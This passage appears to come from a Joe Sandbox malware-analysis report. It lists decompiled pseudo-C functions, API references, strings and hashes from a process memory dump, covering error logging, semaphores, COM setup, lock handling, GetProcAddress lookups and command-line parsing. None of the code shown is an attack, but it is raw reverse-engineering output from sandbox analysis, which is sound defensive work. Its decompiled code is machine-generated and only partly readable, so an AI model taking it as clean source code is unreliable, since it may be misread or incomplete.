0x000c214b
0x000c2180
0x000c214d
0x000c214d
0x000c2150
0x000c2174
0x000c2152
0x000c2152
0x000c2155
0x000c2168
0x000c2157
0x000c215a
0x000c215c
0x000c215c
0x000c215a
0x000c2155
0x000c2150
0x000c2192
0x000c21ae
0x000c21be
0x000c21c1
0x000c21c4
0x000c21c7
0x000c21e0
0x000c21e5
0x000c21e6
0x000c21e7
0x000c21ec
0x000c21c9
0x000c21c9
0x000c21d6
0x000c21db
0x000c21db
0x000c21f3
0x000c21f5
0x000c2201
0x000c2206
0x000c2209
0x000c2209
0x000c2211
0x000c2212
0x000c221b
0x000c221c
0x000c222c
0x000c2233
0x000c2239
0x000c2249
0x000c224e
0x000c224f
0x000c2250
0x000c2255
0x000c225c
0x000c2268
0x000c226d
0x000c226d
0x000c2274
0x000c2280
0x000c2285
0x000c2285
0x000c228c
0x000c22a9
0x000c22bf
0x000c22c4
0x000c22c5
0x000c22c6
0x000c22ab
0x000c22b5
0x000c22ba
0x000c228e
0x000c228e
0x000c229b
0x000c22a0
0x000c228c
0x00000000
0x000c2122
0x000c2127
0x000c212d
0x000c2135
0x000c22ce
0x000c22ce
0x00000000
0x000c22ce
0x00000000
0x000c2135
0x000c2118

APIs

FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,?,00000400,?,00000100,00000000), ref: 000C21AE
GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 000C2215

Strings

[%hs(%hs)], xrefs: 000C2294
Exception, xrefs: 000C2180
[%hs], xrefs: 000C22AE
, xrefs: 000C2249
CallContext:[%hs] , xrefs: 000C2279
%hs!%p: , xrefs: 000C21E0
FailFast, xrefs: 000C215C
(caller: %p) , xrefs: 000C21FA
LogHr, xrefs: 000C2168
%hs(%d) tid(%x) %08X %ws, xrefs: 000C2225
Msg:[%ws] , xrefs: 000C2261
%hs(%d)\%hs!%p: , xrefs: 000C21CF
ReturnHr, xrefs: 000C2174

Memory Dump Source

Source File: 00000003.00000002.298453184.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.298449492.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298458296.00000000000C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298463618.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_r3F3.jbxd

Similarity

API ID: CurrentFormatMessageThread
String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%d)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
API String ID: 2411632146-2849347638
Opcode ID: fa79a6b5e746ea9de474c9eb19fe5407349af69e9395991e4dc1ed9379102881
Instruction ID: 3054fadac7e1149eed4560a4e6fd2b423a0eef28939f2a8602a209aae81aef4f
Opcode Fuzzy Hash: fa79a6b5e746ea9de474c9eb19fe5407349af69e9395991e4dc1ed9379102881
Instruction Fuzzy Hash: F75110B1900300BBEB305F658C49FEFB7F9EB65704F18495EFA46929A3DA719940CB60

Uniqueness

Uniqueness Score: -1.00%

Function 000C2A6E Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 101
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E000C2A6E(void* __ecx, intOrPtr* __edx) {
				void* _v0;
				long _v8;
				long _v12;
				long _t11;
				long _t18;
				void* _t27;
				intOrPtr* _t40;
				void* _t41;

				_t27 = __ecx;
				_t41 = __ecx;
				_t40 = __edx;
				_t11 = WaitForSingleObject(__ecx, 0);
				if(_t11 != 0xffffffff) {
					if(_t11 == 0 || _t11 == 0x102) {
						_v8 = 0;
						if(_t11 != 0) {
							_v12 = 0;
							if(ReleaseSemaphore(_t41, 1,  &_v12) != 0) {
								if(_v12 == 0) {
									if(ReleaseSemaphore(_t41, 1, 0) != 0 || GetLastError() != 0x12a) {
										goto L24;
									} else {
										_t18 = WaitForSingleObject(_t41, 0);
										if(_t18 != 0xffffffff) {
											if(_t18 == 0) {
												L22:
												 *_t40 = _v8;
												return 0;
											}
											goto L24;
										}
										L2:
										return E000C2925("wil");
									}
								}
								goto L24;
							}
							goto L2;
						}
						if(ReleaseSemaphore(_t41, 1,  &_v8) != 0) {
							_v8 = _v8 + 1;
							if(ReleaseSemaphore(_t41, 1, 0) != 0 || GetLastError() != 0x12a) {
								goto L24;
							} else {
								goto L22;
							}
						}
						goto L2;
					} else {
						L24:
						E000C2906(_t27, 0x8000ffff);
						return 0x8000ffff;
					}
				}
				goto L2;
			}

0x000c2a6e
0x000c2a7b
0x000c2a7f
0x000c2a81
0x000c2a8a
0x000c2aa5
0x000c2ab8
0x000c2abd
0x000c2aff
0x000c2b0e
0x000c2b1d
0x000c2b32
0x00000000
0x000c2b41
0x000c2b43
0x000c2b4c
0x000c2b5a
0x000c2b63
0x000c2b66
0x00000000
0x000c2b68
0x00000000
0x000c2b5c
0x000c2a91
0x00000000
0x000c2a99
0x000c2b32
0x00000000
0x000c2b1f
0x00000000
0x000c2b10
0x000c2ace
0x000c2ad7
0x000c2ae6
0x00000000
0x00000000
0x00000000
0x00000000
0x000c2ae6
0x00000000
0x000c2aae
0x000c2b71
0x000c2b7b
0x00000000
0x000c2b80
0x000c2aa5
0x00000000

APIs

WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,?), ref: 000C2A81

Strings

wil, xrefs: 000C2A94

Memory Dump Source

Source File: 00000003.00000002.298453184.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.298449492.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298458296.00000000000C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298463618.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_r3F3.jbxd

Similarity

API ID: ObjectSingleWait
String ID: wil
API String ID: 24740636-1589926490
Opcode ID: efb4e5ebe3f85e427bfc3e5d4273f4cc7dcfc0e4544b34ef6d87fdd9dfff3a44
Instruction ID: f78d3fcd1113ddc78ce362116c7bed61721f6d08064d885c8332e511e2bd8082
Opcode Fuzzy Hash: efb4e5ebe3f85e427bfc3e5d4273f4cc7dcfc0e4544b34ef6d87fdd9dfff3a44
Instruction Fuzzy Hash: C4316D3060020AEBEB205F659C89FAF37A9EF81754F304139F906D6AC1D7788D4197A2

Uniqueness

Uniqueness Score: -1.00%

Function 000C35F3 Relevance: 15.1, APIs: 10, Instructions: 102
threadCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E000C35F3(int __eax, WCHAR* __ecx) {
				WCHAR* _v8;
				char _v36;
				WCHAR** _t16;
				void* _t27;
				void* _t28;
				long _t33;
				void* _t34;
				void* _t37;

				_t9 = __eax;
				_v8 = __ecx;
				__imp__CoInitializeEx(0, 2);
				if(__eax >= 0) {
					__imp__CoInitializeSecurity(0xc196c, 0, 0, 0, 0, 0, 0, 8, 0);
					if(__eax < 0) {
						L15:
						__imp__CoUninitialize();
						return _t9;
					}
					E000C1FFF(__ecx);
					_t9 = CreateEventW(0, 1, 0, 0);
					 *0xc841c = _t9;
					if(_t9 == 0) {
						goto L15;
					}
					_t33 = GetCurrentThreadId();
					_t37 = E000C5373();
					if( *((intOrPtr*)(_t37 + 4)) == 0) {
						 *0xc84ac = 0;
						 *0xc84a8 = 0xc1028;
						 *0xc84b0 = _t33;
						 *((intOrPtr*)(_t37 + 4)) = 0xc84a8;
					}
					_t27 = E000C4C9B(_t37);
					_t34 = CreateEventW(0, 0, 0, _v8);
					if(_t34 != 0) {
						SetEvent(_t34);
						CloseHandle(_t34);
					}
					if(_t27 < 0) {
						_t28 = 0;
						goto L14;
					} else {
						_t16 =  &_v8;
						_t28 = 0;
						__imp__CoWaitForMultipleHandles(0, 0x7530, 1, 0xc841c, _t16);
						if(_t16 != 0) {
							L12:
							E000C339C(_t37);
							L14:
							_t9 = CloseHandle( *0xc841c);
							 *0xc841c = _t28;
							goto L15;
						}
						while(1) {
							_push(_t28);
							_push(_t28);
							_push(_t28);
							_push( &_v36);
							if( *0xcb038() <= 0) {
								goto L12;
							}
							 *0xcb03c( &_v36);
							 *0xcb040( &_v36);
						}
						goto L12;
					}
				}
				return __eax;
			}

0x000c35f3
0x000c3600
0x000c3604
0x000c360c
0x000c3620
0x000c3628
0x000c3710
0x000c3710
0x00000000
0x000c3710
0x000c362e
0x000c3638
0x000c363e
0x000c3645
0x00000000
0x00000000
0x000c3653
0x000c365a
0x000c365f
0x000c3661
0x000c3667
0x000c3671
0x000c3677
0x000c3677
0x000c3688
0x000c3695
0x000c3699
0x000c369c
0x000c36a3
0x000c36a3
0x000c36ab
0x000c36fa
0x00000000
0x000c36ad
0x000c36ad
0x000c36b0
0x000c36c0
0x000c36c8
0x000c36f1
0x000c36f3
0x000c36fc
0x000c3702
0x000c3709
0x00000000
0x000c370f
0x000c36e0
0x000c36e0
0x000c36e1
0x000c36e2
0x000c36e6
0x000c36ef
0x00000000
0x00000000
0x000c36d0
0x000c36da
0x000c36da
0x00000000
0x000c36e0
0x000c36ab
0x000c371a

APIs

CoInitializeEx.API-MS-WIN-CORE-COM-L1-1-0(00000000,00000002), ref: 000C3604
CoInitializeSecurity.API-MS-WIN-CORE-COM-L1-1-0(000C196C,00000000,00000000,00000000,00000000,00000000,00000000,00000008,00000000), ref: 000C3620
CoUninitialize.API-MS-WIN-CORE-COM-L1-1-0 ref: 000C3710

Part of subcall function 000C1FFF: CoCreateInstance.API-MS-WIN-CORE-COM-L1-1-0(000C160C,00000000,00000001,000C18E4,?), ref: 000C2022

CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000001,00000000,00000000), ref: 000C3638
GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 000C364D
CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,?), ref: 000C368F
SetEvent.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 000C369C
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 000C36A3
CoWaitForMultipleHandles.API-MS-WIN-CORE-COM-L1-1-0(00000000,00007530,00000001,000C841C,?), ref: 000C36C0
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 000C3702

Memory Dump Source

Source File: 00000003.00000002.298453184.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.298449492.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298458296.00000000000C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298463618.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_r3F3.jbxd

Similarity

API ID: CreateEvent$CloseHandleInitialize$CurrentHandlesInstanceMultipleSecurityThreadUninitializeWait
String ID:
API String ID: 126492752-0
Opcode ID: cb490df3abc70b9e4d06a9181b5103f20615901cb4022ecd9cecd7d375ddfcb5
Instruction ID: 3a1cba09d3cefb8225db7fe5465a8ed018796d331c703c03471d344095bdd95c
Opcode Fuzzy Hash: cb490df3abc70b9e4d06a9181b5103f20615901cb4022ecd9cecd7d375ddfcb5
Instruction Fuzzy Hash: 23316FB1610305BFF7106BA1AC8DFAE3AACFB44745B14806DF90592261DB78D9459B24

Uniqueness

Uniqueness Score: -1.00%

Function 000C3233 Relevance: 12.1, APIs: 8, Instructions: 108COMMON

Download Yara Rule

APIs

AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(000C8490), ref: 000C3264
DecodePointer.API-MS-WIN-CORE-UTIL-L1-1-0(?), ref: 000C3273
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(000C8490), ref: 000C3298
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(000C8490), ref: 000C32AA
AcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(000C8490), ref: 000C32DE
EncodePointer.API-MS-WIN-CORE-UTIL-L1-1-0(?), ref: 000C32F0
DecodePointer.API-MS-WIN-CORE-UTIL-L1-1-0(?), ref: 000C32FE
ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(000C8490), ref: 000C331B

Memory Dump Source

Source File: 00000003.00000002.298453184.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.298449492.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298458296.00000000000C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298463618.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_r3F3.jbxd

Similarity

API ID: Lock$PointerReleaseShared$AcquireDecodeExclusive$Encode
String ID:
API String ID: 3770696666-0
Opcode ID: ed5a1d9956d0eb54062b2502a91b6a86b90bd7a1453b6c60645605f4e13b5eb5
Instruction ID: 519170bcfd7993bbb7d14e53e3a7f937e421df9480a41f0c76b6d5fa87ccac7b
Opcode Fuzzy Hash: ed5a1d9956d0eb54062b2502a91b6a86b90bd7a1453b6c60645605f4e13b5eb5
Instruction Fuzzy Hash: 95413B35A00219EFDB119F64CC49EAEBBB9FF49711B198099ED069B360CB35AE41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 000C3B92 Relevance: 12.1, APIs: 8, Instructions: 99
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E000C3B92(struct HINSTANCE__* __ecx, short* __edx, intOrPtr* _a4) {
				struct HINSTANCE__* _v8;
				int _v12;
				int _v16;
				short _t20;
				int _t21;
				int _t22;
				char _t28;
				char _t31;
				signed short _t33;
				char _t36;
				short* _t39;
				char* _t42;
				short* _t45;
				short* _t46;
				CHAR* _t47;
				void* _t48;
				CHAR* _t51;

				_t46 = __edx;
				_v8 = __ecx;
				 *_a4 = 0;
				_t36 = 0;
				if(__edx == 0) {
					L14:
					return _t36;
				}
				if( *((short*)(__edx)) != 0x23) {
					L4:
					_t39 = _t46;
					_t45 =  &(_t39[1]);
					do {
						_t20 =  *_t39;
						_t39 =  &(_t39[1]);
					} while (_t20 != 0);
					_t21 = (_t39 - _t45 >> 1) + 1;
					_v16 = _t21;
					_t22 = _t21 + _t21;
					_v12 = _t22;
					_t51 = LocalAlloc(0, _t22 + 2);
					if(_t51 == 0) {
						goto L14;
					}
					if(WideCharToMultiByte(0, 0x400, _t46, _v16, _t51, _v12, 0, 0) == 0) {
						L13:
						LocalFree(_t51);
						goto L14;
					}
					_t47 = _t51;
					_t10 =  &(_t47[1]); // 0x1
					_t42 = _t10;
					do {
						_t28 =  *_t47;
						_t47 =  &(_t47[1]);
					} while (_t28 != 0);
					_t48 = _t47 - _t42;
					_t51[_t48] = 0x57;
					_t36 = GetProcAddress(_v8, _t51);
					if(_t36 == 0) {
						_t51[_t48] = 0x41;
						 *_a4 = 1;
						_t31 = GetProcAddress(_v8, _t51);
						_t36 = _t31;
						if(_t36 == 0) {
							_t51[_t48] = _t31;
							_t36 = GetProcAddress(_v8, _t51);
						}
					}
					goto L13;
				}
				_t33 = __edx + 2;
				if( *_t33 == 0) {
					goto L4;
				} else {
					__imp___wtoi(_t33);
					_t36 = GetProcAddress(__ecx, _t33 & 0x0000ffff);
					goto L14;
				}
			}

0x000c3ba2
0x000c3ba6
0x000c3ba9
0x000c3bab
0x000c3baf
0x000c3c84
0x000c3c8a
0x000c3c8a
0x000c3bb9
0x000c3bdd
0x000c3bdd
0x000c3be1
0x000c3be4
0x000c3be4
0x000c3be7
0x000c3bea
0x000c3bf3
0x000c3bf6
0x000c3bf9
0x000c3bfb
0x000c3c09
0x000c3c0d
0x00000000
0x00000000
0x000c3c29
0x000c3c7b
0x000c3c7c
0x00000000
0x000c3c7c
0x000c3c2b
0x000c3c2d
0x000c3c2d
0x000c3c30
0x000c3c30
0x000c3c32
0x000c3c33
0x000c3c37
0x000c3c3d
0x000c3c49
0x000c3c4d
0x000c3c56
0x000c3c5a
0x000c3c60
0x000c3c66
0x000c3c6a
0x000c3c70
0x000c3c79
0x000c3c79
0x000c3c6a
0x00000000
0x000c3c4d
0x000c3bbb
0x000c3bc1
0x00000000
0x000c3bc3
0x000c3bc4
0x000c3bd6
0x00000000
0x000c3bd6

APIs

_wtoi.MSVCRT ref: 000C3BC4
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?), ref: 000C3BD0
LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?), ref: 000C3C03
WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000400,?,?,00000000,?,00000000,00000000), ref: 000C3C21
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,?,?,00000000,?,00000000,00000000), ref: 000C3C43
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,?,?,00000000,?,00000000,00000000), ref: 000C3C60
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,?,?,00000000,?,00000000,00000000), ref: 000C3C73
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,?,00000000,?,00000000,00000000), ref: 000C3C7C

Memory Dump Source

Source File: 00000003.00000002.298453184.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.298449492.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298458296.00000000000C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298463618.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_r3F3.jbxd

Similarity

API ID: AddressProc$Local$AllocByteCharFreeMultiWide_wtoi
String ID:
API String ID: 3528786098-0
Opcode ID: f963fe90c90371f66d76d7a9d02042ca96ff436aeb5cd48b210e390b9f4df314
Instruction ID: 2f3e6f328da575db1c16100a8ec0cc01f9efb99679bf88936be5df9176d8a251
Opcode Fuzzy Hash: f963fe90c90371f66d76d7a9d02042ca96ff436aeb5cd48b210e390b9f4df314
Instruction Fuzzy Hash: FF318F76600206AFDB215BA89888EAEBBF9EF49310B14816DED06D3210D7758E01CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 000C564D Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 249
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E000C564D(WCHAR* __ecx, signed int* __edx, WCHAR** _a4, signed int* _a8, signed int* _a12) {
				WCHAR* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _t40;
				signed int _t41;
				signed short _t44;
				signed int* _t45;
				signed int _t47;
				signed short _t53;
				signed int _t55;
				void* _t57;
				signed int _t59;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t64;
				signed int _t65;
				signed short _t66;
				signed int _t67;
				signed int _t68;
				signed short _t69;
				signed int _t70;
				signed int _t72;
				signed int* _t74;
				signed int _t75;
				signed int _t76;
				void* _t77;
				WCHAR* _t79;
				void* _t80;
				signed int _t81;
				signed short _t84;
				signed int _t85;
				signed int _t86;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				signed short _t90;
				void* _t94;
				void* _t95;
				void* _t97;
				WCHAR* _t98;
				void* _t99;
				signed short _t100;
				WCHAR* _t103;
				void* _t104;
				void* _t105;
				signed int _t106;

				_t103 = __ecx;
				_v16 = 0x2f;
				_t79 = 0;
				_v8 = __ecx;
				 *_a4 = 0;
				_t74 = __edx;
				_t106 = __ecx;
				_v12 = __edx;
				 *__edx = 0;
				 *_a8 = 0;
				_t94 = 0x20;
				 *_a12 = 0;
				if( *__ecx == 0) {
					L22:
					_t40 =  *_t103 & 0x0000ffff;
					if(_t40 != 0) {
						_t95 = 0x2c;
						_t80 = 0x22;
						if(_t40 != _t80) {
							_t41 =  *_t106 & 0x0000ffff;
							if(_t41 == 0) {
								L38:
								if( *_t106 != 0) {
									_t43 = 0;
									L42:
									 *_t106 = _t43;
									_t106 = _t106 + 2;
									_t44 =  *_t106 & 0x0000ffff;
									if(_t44 == 0) {
										L48:
										_t45 = _v12;
										_t75 = _t106;
										_t81 = _t106;
										_v20 = _t75;
										_v8 = _t106;
										_v16 = _t81;
										if(( *_t45 & 0x00000003) != 0) {
											L67:
											 *_a4 = _t103;
											_t47 =  *_t45 & 0x00000003;
											if(_t47 != 0) {
												_t106 = _t81;
											}
											asm("sbb eax, eax");
											 *_a8 =  !( ~_t47) & _t75;
											 *_a12 = _t106;
											return 1;
										}
										_t53 =  *_t106 & 0x0000ffff;
										if(_t53 == 0) {
											goto L23;
										}
										_t84 = _t53;
										_t97 = 0x20;
										while(1) {
											_t76 = _t84 & 0x0000ffff;
											if(_t84 == _t97) {
												break;
											}
											_t106 = _t106 + 2;
											_t63 =  *_t106 & 0x0000ffff;
											_t84 = _t63;
											_t76 = _t63;
											if(_t63 != 0) {
												continue;
											}
											break;
										}
										_t98 = _v8;
										if(_t76 == 0) {
											L59:
											_t55 =  *_t98 & 0x0000ffff;
											if(_t55 == 0) {
												L64:
												_t98 = 0;
												L65:
												if(_t98 != 0) {
													goto L23;
												}
												_t81 = _v16;
												_t75 = _v20;
												_t45 = _v12;
												goto L67;
											}
											_t85 = _t55;
											while(_t85 != 0x5c) {
												_t57 = 0x2f;
												if(_t85 == _t57) {
													goto L65;
												}
												_t98 = CharNextW(_t98);
												_t59 =  *_t98 & 0x0000ffff;
												_t85 = _t59;
												if(_t59 != 0) {
													continue;
												}
												goto L64;
											}
											goto L65;
										}
										 *_t106 = 0;
										_t106 = _t106 + 2;
										_t61 =  *_t106 & 0x0000ffff;
										if(_t61 == 0) {
											goto L59;
										}
										_t86 = _t61;
										_t99 = 0x20;
										while(_t86 <= _t99) {
											_t106 = _t106 + 2;
											_t62 =  *_t106 & 0x0000ffff;
											_t86 = _t62;
											if(_t62 != 0) {
												continue;
											}
											break;
										}
										_t98 = _v8;
										goto L59;
									}
									_t87 = _t44 & 0x0000ffff;
									_t104 = 0x20;
									while(_t87 == _t104 || _t87 == _t95) {
										_t106 = _t106 + 2;
										_t64 =  *_t106 & 0x0000ffff;
										_t87 = _t64;
										if(_t64 != 0) {
											continue;
										}
										break;
									}
									_t103 = _v8;
									goto L48;
								}
								if(( *_t74 & 0x00000003) != 0) {
									goto L48;
								}
								goto L23;
							}
							_t88 = _t41;
							_t105 = 0x20;
							while(_t88 != _t105 && _t88 != _t95) {
								_t106 = _t106 + 2;
								_t65 =  *_t106 & 0x0000ffff;
								_t88 = _t65;
								if(_t65 != 0) {
									continue;
								}
								break;
							}
							_t103 = _v8;
							goto L38;
						}
						_t17 = _t106 + 2; // 0x2
						_t103 = _t17;
						_t106 = _t103;
						_v8 = _t103;
						_t66 =  *_t106 & 0x0000ffff;
						_t89 = _t66;
						if(_t66 == 0) {
							L30:
							_t43 = 0;
							if(_t89 == 0) {
								return 0;
							}
							goto L42;
						}
						_t100 = _t66;
						_t77 = 0x22;
						while(1) {
							_t89 = _t100 & 0x0000ffff;
							if(_t100 == _t77) {
								break;
							}
							_t106 = _t106 + 2;
							_t67 =  *_t106 & 0x0000ffff;
							_t100 = _t67;
							_t89 = _t67;
							if(_t67 != 0) {
								continue;
							}
							break;
						}
						_t95 = 0x2c;
						goto L30;
					}
					L23:
					return 0;
				} else {
					goto L1;
				}
				do {
					L1:
					if( *_t103 != _t94) {
						L4:
						_t68 =  *_t103 & 0x0000ffff;
						if(_t68 == _v16 || _t68 == 0x2d) {
							_t9 = _t106 + 2; // 0x2
							_t103 = _t9;
							_t69 =  *_t103 & 0x0000ffff;
							_t106 = _t103;
							_v8 = _t103;
							if(_t69 == 0) {
								goto L20;
							}
							_t90 = _t69;
							while(_t90 != _t94) {
								_t70 = _t90 & 0x0000ffff;
								if(_t70 == 0x4c) {
									L15:
									if(E000C55E5(L"localserver",  &_v8) != 0) {
										 *_t74 =  *_t74 | 0x00000002;
									}
									L17:
									_t103 = _v8;
									_t94 = 0x20;
									L18:
									_t103 =  &(_t103[1]);
									_t106 = _t103;
									_v8 = _t103;
									_t72 =  *_t103 & 0x0000ffff;
									_t90 = _t72;
									if(_t72 != 0) {
										continue;
									}
									break;
								}
								if(_t70 == 0x53) {
									L13:
									if(E000C55E5(0xc1948,  &_v8) != 0) {
										 *_t74 =  *_t74 | 0x00000001;
									}
									goto L17;
								}
								if(_t70 == 0x6c) {
									goto L15;
								}
								if(_t70 != 0x73) {
									goto L18;
								}
								goto L13;
							}
							_v8 = _t103;
							_t79 = 0;
							goto L20;
						} else {
							break;
						}
					} else {
						goto L2;
					}
					goto L4;
					L2:
					_t103 =  &(_t103[1]);
					_t106 = _t103;
					if( *_t103 == _t94) {
						goto L2;
					} else {
						_v8 = _t103;
						goto L4;
					}
					L20:
				} while ( *_t103 != _t79);
				_v8 = _t103;
				goto L22;
			}

0x000c565b
0x000c565d
0x000c5664
0x000c5666
0x000c5669
0x000c566b
0x000c5670
0x000c5674
0x000c5677
0x000c5679
0x000c567e
0x000c567f
0x000c5684
0x000c572b
0x000c572b
0x000c5731
0x000c573c
0x000c573f
0x000c5743
0x000c5783
0x000c5789
0x000c57aa
0x000c57af
0x000c57bb
0x000c57bd
0x000c57bd
0x000c57c0
0x000c57c3
0x000c57c9
0x000c57eb
0x000c57eb
0x000c57ee
0x000c57f0
0x000c57f2
0x000c57f5
0x000c57f8
0x000c57fe
0x000c589e
0x000c58a3
0x000c58a5
0x000c58a8
0x000c58aa
0x000c58aa
0x000c58b1
0x000c58b7
0x000c58bf
0x00000000
0x000c58bf
0x000c5804
0x000c580a
0x00000000
0x00000000
0x000c5812
0x000c5814
0x000c5815
0x000c5815
0x000c581b
0x00000000
0x00000000
0x000c581d
0x000c5820
0x000c5823
0x000c5825
0x000c582a
0x00000000
0x00000000
0x00000000
0x000c582a
0x000c582c
0x000c5832
0x000c585e
0x000c585e
0x000c5864
0x000c5889
0x000c588b
0x000c588d
0x000c588f
0x00000000
0x00000000
0x000c5895
0x000c5898
0x000c589b
0x00000000
0x000c589b
0x000c5866
0x000c5868
0x000c5870
0x000c5874
0x00000000
0x00000000
0x000c587d
0x000c587f
0x000c5882
0x000c5887
0x00000000
0x00000000
0x00000000
0x000c5887
0x00000000
0x000c5868
0x000c5836
0x000c5839
0x000c583c
0x000c5842
0x00000000
0x00000000
0x000c5846
0x000c5848
0x000c5849
0x000c584e
0x000c5851
0x000c5854
0x000c5859
0x00000000
0x00000000
0x00000000
0x000c5859
0x000c585b
0x00000000
0x000c585b
0x000c57cd
0x000c57d0
0x000c57d1
0x000c57db
0x000c57de
0x000c57e1
0x000c57e6
0x00000000
0x00000000
0x00000000
0x000c57e6
0x000c57e8
0x00000000
0x000c57e8
0x000c57b4
0x00000000
0x00000000
0x00000000
0x000c57b6
0x000c578d
0x000c578f
0x000c5790
0x000c579a
0x000c579d
0x000c57a0
0x000c57a5
0x00000000
0x00000000
0x00000000
0x000c57a5
0x000c57a7
0x00000000
0x000c57a7
0x000c5745
0x000c5745
0x000c5748
0x000c574a
0x000c574d
0x000c5750
0x000c5755
0x000c5776
0x000c5776
0x000c577b
0x000c58c7
0x000c58c7
0x00000000
0x000c5781
0x000c5759
0x000c575b
0x000c575c
0x000c575c
0x000c5762
0x00000000
0x00000000
0x000c5764
0x000c5767
0x000c576a
0x000c576c
0x000c5771
0x00000000
0x00000000
0x00000000
0x000c5771
0x000c5775
0x00000000
0x000c5775
0x000c5733
0x00000000
0x00000000
0x00000000
0x00000000
0x000c568a
0x000c568a
0x000c568d
0x000c569c
0x000c569c
0x000c56a3
0x000c56aa
0x000c56aa
0x000c56ad
0x000c56b0
0x000c56b2
0x000c56b8
0x00000000
0x00000000
0x000c56ba
0x000c56bc
0x000c56c1
0x000c56c7
0x000c56ee
0x000c56fd
0x000c56ff
0x000c56ff
0x000c5702
0x000c5702
0x000c5707
0x000c5708
0x000c5708
0x000c570b
0x000c570d
0x000c5710
0x000c5713
0x000c5718
0x00000000
0x00000000
0x00000000
0x000c5718
0x000c56cc
0x000c56d8
0x000c56e7
0x000c56e9
0x000c56e9
0x00000000
0x000c56e7
0x000c56d1
0x00000000
0x00000000
0x000c56d6
0x00000000
0x00000000
0x00000000
0x000c56d6
0x000c571a
0x000c571d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x000c568f
0x000c568f
0x000c5692
0x000c5697
0x00000000
0x000c5699
0x000c5699
0x00000000
0x000c5699
0x000c571f
0x000c571f
0x000c5728
0x00000000

APIs

CharNextW.API-MS-WIN-CORE-STRING-L2-1-0(?,00000000,?,00000000,?), ref: 000C5877

Strings

/, xrefs: 000C565D
localserver, xrefs: 000C56F1
sta, xrefs: 000C56DB

Memory Dump Source

Source File: 00000003.00000002.298453184.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.298449492.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
